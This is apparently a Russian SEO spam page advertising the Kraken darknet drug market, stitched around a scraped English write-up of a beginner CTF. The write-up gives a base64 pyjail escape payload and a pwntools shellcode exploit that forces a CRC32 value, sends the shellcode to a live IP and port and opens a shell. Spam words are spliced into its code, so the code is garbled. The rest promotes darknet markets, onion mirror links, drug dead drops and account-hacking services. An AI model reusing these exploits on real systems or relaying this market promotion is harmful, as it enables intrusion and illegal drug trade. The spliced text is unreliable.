ПЕРЕЙТИ В КРАКЕН

Кракен наркокортель

This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l!= 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a.pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num мега = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside, bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, кракен -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if (!(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1), 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related

Кракен наркокортель - Кракен безопасный вход

При входе на правильный сайт вы увидите экран загрузки. Самый удобный способ отслеживать актуальные изменения - делать это на этой странице. К тому же слова «санкции» и «Гидра» американские власти упомянули в одном документе. Гарантия возврата! Введя капчу, вы сразу же попадете на портал. Onion - The Majestic Garden  зарубежная торговая площадка в виде форума, открытая регистрация, много всяких плюшек в виде multisig, 2FA, существует уже пару лет. Книжная купить по выгодной цене на АлиЭкпресс. В статье делаю обзорную экскурсию по облачному хранилищу - как загружать и делиться. Matanga уверенно занял свою нишу и не скоро покинет насиженное место. У моего провайдера так рука и не поднялась заблокировать RedTube, Вадим Елистратов, TJournal Онион страницы ресурсы, работающие только в «луковых» сетях. Сколько денег потеряла «Гидра». Отзывов не нашел, кто-нибудь работал с ними или знает проверенные подобные магазы? Для этого топаем в ту папку, куда распаковывали (не забыл ещё куда его пристроил?) и находим в ней файлик. Либо воспользоваться специальным онлайн-сервисом. Цели взлома грубой силой. Авторы расширения отдельно отмечают, что при его использовании не теряется скорость. В этом видео мы рассмотрим основной на сегодняшний день маркетплейс- Mega Darknet Market). Onion - The Pirate Bay,.onion зеркало торрент-трекера, скачивание без регистрации. Всегда свежая ОМГ! Какие города готовы "забрать" новый трек? Onion - Autistici  древний и надежный комплекс всяких штук для анона: VPN, email, jabber и даже блоги. Источник p?titleRussian_Anonymous_Marketplace oldid. Рано утром 5 апреля крупнейшая даркнет-площадка по продаже наркотиков «Гидра» перестала загружаться у всех пользователей. Эта надпись означает, что один из крупнейших даркнет-форумов России «лег» вслед за «Гидрой». Гидра гидра ссылка hydra ссылка com гидры гидра сайт гидра зеркало зеркала гидры гидра ссылки hydra2support через гидру зеркало гидры гидра. Всё что вы делаете в тёмном интернете, а конкретно на сайте ОМГ ОМГ остаётся полностью анонимным и недоступным ни для кого, кроме вас. Все ссылки даю в текстовом виде. Просмотр.onion сайтов без браузера Tor(Proxy). Настоящая ссылка зеркала только одна. Рядом со строкой поиска вы можете найти отзывы о товаре, который искали, а так же рейтинг магазина, который выставляют пользователи, которые уже закупались, а так же там показаны некоторые условия товара, если они имеются. У моего провайдера так рука и не поднялась заблокировать RedTube, Вадим Елистратов, TJournal Онион страницы ресурсы, работающие только в «луковых» сетях. Здесь можно ознакомиться с подробной информацией, политикой конфиденциальности. Вы используете устаревший браузер. Именно тем фактом, что площадка не занималась продажей оружия, детской порнографии и прочих запрещённых предметов Darkside объяснял низкий интерес правоохранительных органов к деятельности ресурса. Sblib3fk2gryb46d.onion - Словесный богатырь, книги. Hiremew3tryzea3d.onion/ - HireMe  Первый сайт для поиска работы в дипвебе. Вместо курьера вы получите адрес и описание места где забрать заказ.

Удобное расположение элементов на странице веб сайта поможет вам быстро найти всё необходимое для вас и так же быстро приобрести это при помощи встроенной крипто валюты прямо на официальном сайте. 1 2 В Германии закрыли сервера даркнетмаркета Hydra и конфисковали биткойны на 23 млн евро. Привычным способом товар не доставляется, по сути это магазин закладок. Наглядный пример: На главной странице магазина вы всегда увидите первый проверочный код Мега Даркнет, он же Капча. Некоторые сервисы мега вообще не предусматривают возможности выхода на них из-за решения Роскомнадзора. На 15:00. При нарушениях магазин мог быть «Гидрой» оштрафован или закрыт. Кстати, о том, что и сама Windows представляет из себя один громадный троян и спайварь, кому-то ещё напоминать надо? Им оказался бизнесмен из Череповца. Рядом со строкой поиска вы можете найти отзывы о товаре, который искали, а так же рейтинг магазина, который выставляют пользователи, которые уже закупались, а так же там показаны некоторые условия товара, если они имеются. ( Линуксоиды тут могут вздохнуть свободно - их подобные детские проблемы «форточек» не волнуют ни разу ). Начали конкурентную борьбу между собой за право быть первым в даркнете. Всё что нужно: деньги, любые документы или услуги по взлому аккаунтов вы можете приобрести, не выходя из вашего дома. После этого «Гидра» и все ее зеркала окончательно отключились. Инфо / 24 Лента, которая победила Гидру Архивная копия от на Wayback Machine. Александр Губинский, Самараавтожгут: Как мы получали грант на внедрение компьютерного зрения Поддержка ИТ-отрасли Через этот даркнет- сайт также велась продажа персональных данных и поддельных документов, говорится в сообщении немецких силовиков. В некоторых странах сеть Tor уже запрещена. В Москве вручили Премию Рунета-2019 Архивная копия от на Wayback Machine. Будущее несырьевого экспорта: как найти покупателя за рубежом Цифровизация Но, в отличие от «Гидры UniCC закрылся не из-за действий властей. Как мы знаем "рынок не терпит пустоты" и в теневом интернет пространстве стали набирать популярность два других аналогичных сайта, которые уже существовали до закрытия Hydra. Пользователи осуществляли транзакции через. Onion Probiv достаточно популярный форум по пробиву информации, обсуждение и совершение сделок по различным серых схемам. Таких людей никто не любит, руки бы им пообломать. Всё что вы делаете в тёмном интернете, а конкретно на сайте ОМГ ОМГ остаётся полностью анонимным и недоступным ни для кого, кроме вас. Вот такое вот окошко как раз и показывает, что происходит. One TOR зеркало http probivoz7zxs7fazvwuizub3wue5c6vtcnn6267fq4tmjzyovcm3vzyd. Некоторые из них идейные. Источник Источник. В итоге купил что хотел, я доволен. Всё что нужно: деньги, любые документы или услуги по взлому аккаунтов вы можете приобрести, не выходя из вашего дома. Пока не забыл сразу расскажу один подозрительный для меня факт про ramp marketplace. Хотя слова «скорость» и «бросается» здесь явно неуместны. Потому что даже в пресс-релизе немецких силовиков есть ошибки». Всегда смотрите на адресную строку браузера, так вы сделаете все правильно! Также обещают исправить Qiwi, Юмани, Web Money, Pay Pal. Как пополнить Мега Даркнет Кратко: все онлайн платежи только в крипте, кроме наличных денег. Итак, скачать Tor Browser Bundle проще всего с наших страниц. Комментарии Fantom98 Сегодня Поначалу не мог разобраться с пополнением баланса, но через 10 мин всё-таки пополнил и оказалось совсем не трудно это сделать. После этого, по мнению завсегдатаев теневых ресурсов, было принято решение об отключении серверов и, соответственно, основной инфраструктуры «Гидры». Желание «держать и не пущать» в людях, дорвавшихся до власти, неистребимо. Здесь же многие журналисты получают огромное количество компромата без цензуры на интересуемых людей. Одним из самых простых способов войти в Мегу это использовать браузер Тор. При этом на полной скорости машина может разгоняться до 350 километров в час. Assassination Market (http assmkedzgorodn7o.onion - тотализатор на угадывании даты смерти всяких нехороших людей. Никто никогда не сможет совместить действия совершенные в интернете и вашу личность в реальном мире. Есть закрытые площадки типа russian anonymous marketplace, но на данный момент ramp russian anonymous marketplace уже более 3 месяцев не доступна из за ддос атак. «Демократические реформы» в мире идут полным ходом. Ру" отверг обвинения в скрытой рекламе наркоплощадки Hydra Архивная копия от на Wayback Machine.

Моментальный кракен это такой способ покупки, когда вам показаны только варианты когда покупка мгновенная, то есть без подтверждения продавца. Отойдя от темы форума, перейдем к схожей, но не менее важной теме, теме отзывов. Любой покупатель кракен без труда найдет на просторах маркетплейса именно тот товар, который ему нужен, и сможет его приобрести по выгодной цене в одном из десятков тысяч магазинов. Перейти можно по кнопке ниже: Перейти на Mega Что такое Мега Mega - торговая платформа, доступная в сети Tor с 2022 года. Поисковики Настоятельно рекомендуется тщательно проверять ссылки, рабочие которые доступны в выдаче поисковой системы. Видно число проведенных сделок в профиле. Так же есть ещё и основная ссылка для перехода в логово Hydra, она работает на просторах сети onion и открывается только с помощью Tor браузера - http hydraruzxpnew4аf. Если же ничего не заполнять в данной строке, то Мега даст вам все возможные варианты, которые только существуют. 3 Как войти на Mega через iOS. Т.е. Отзывы о великой Меге встречаются разные. Она защищает сайт Mega от DDoS-атак, которые систематически осуществляются. Почему пользователи выбирают Mega? Наши администраторы систематически мониторят и обновляют перечень зеркал площадки. При входе на правильный сайт вы увидите экран загрузки. Ссылка на мегу. Форум это отличный способ пообщаться с публикой сайта, здесь можно узнать что необходимо улучшить, что на сайте происходит не так, так же можно узнать кидал, можно оценить качество того или иного товара, форумчане могут сравнивать цены, делиться впечатлениями от обслуживания тем или иным магазином. Часто сайт маркетплейса заблокирован в РФ или даже в СНГ, поэтому используют обходные зеркала для входа, которые есть на нашем сайте. Но обещают добавить Visa, Master Card, Maestro. В другом доступна покупка продуктов для употребления внутрь. После входа на площадку Hydra мы попадаем в мир разнообразия товаров. Привычным способом товар не доставляется, по сути это магазин закладок. Наша задача вас предупредить, а вы уже всегда думайте своей головой, а Мега будет думать тремя! Последние новости о Мега В конце мая 2021 года многие российские ресурсы выпустили статьи о Омг с указанием прибыли и объема транзакций, осуществляемых на площадке. Данные приводились Flashpoint и Chainalysis. Ассортимент товаров Платформа дорожит своей репутацией, поэтому на страницах сайта представлены только качественные товары. Ну, любой заказ понятно, что обозначает. Так же попасть на сайт Hydra можно, и обойдясь без Тора, при помощи действующего VPN, а так же если вы будете использовать нужные настройки вашего повседневного браузера. Также обещают исправить Qiwi, Юмани, Web Money, Pay Pal. Тем не менее, для iOS существует великолепное приложение Tor. На сайте отсутствует база данных, а в интерфейс магазина Mega вход можно осуществить только через соединение Tor. Именно благодаря этому, благодаря доверию покупателей,а так же работе профессиональной администрации Меге, сайт всё время движется только вперёд! Так же не стоит нарушать этих правил, чтобы попросту не быть наказанным суровой мегой. Mega вход Как зайти на Мегу 1 Как зайти на мегу с компьютера. Официальные ссылки на Мегу Пользователям портала Мега зеркало рекомендуется сохранить в закладки или скопировать адрес, чтобы иметь неограниченный доступ к порталу. Проект запущен командой программистов, за плечами у которых разработка и запуск таких популярных проектов как LegalRC и Ramp. Mega onion рабочее зеркало Как убедиться, что зеркало Mega не поддельное? Немного подождав попадёте на страницу где нужно ввести проверочный код на Меге Даркнет. Union, например ore или новое зеркало, то вы увидите ненастоящий сайт, так как у Mega Url правильная доменная зона. Но сходство элементов дизайна присутствует всегда. Перешел по ссылке и могу сказать, что все отлично работает, зеркала официальной Mega в ClearNet действительно держат соединение. Потребитель не всегда находит товар по причине того что он пожалел своих денег и приобрел товар у малоизвестного, не проверенного продавца, либо же, что не редко встречается, попросту был не внимательным при поиске своего клада. Ещё одной причиной того что, клад был не найден это люди, у которых нет забот ходят и рыщут в поисках очередного кайфа просто «на нюх если быть более точным, то они ищут клады без выданных представителем магазина координат. Если вы всё- таки захотите воспользоваться вторым способом, то ваш интернет- трафик будет передаваться медленнее. На главной странице будут самые популярные магазины Маркетплейса Мега. Постараюсь объяснить более обширно. Выглядит Капча Меги так: После успешного ввода капчи на главной странице, вы зайдете на форму входа Меги.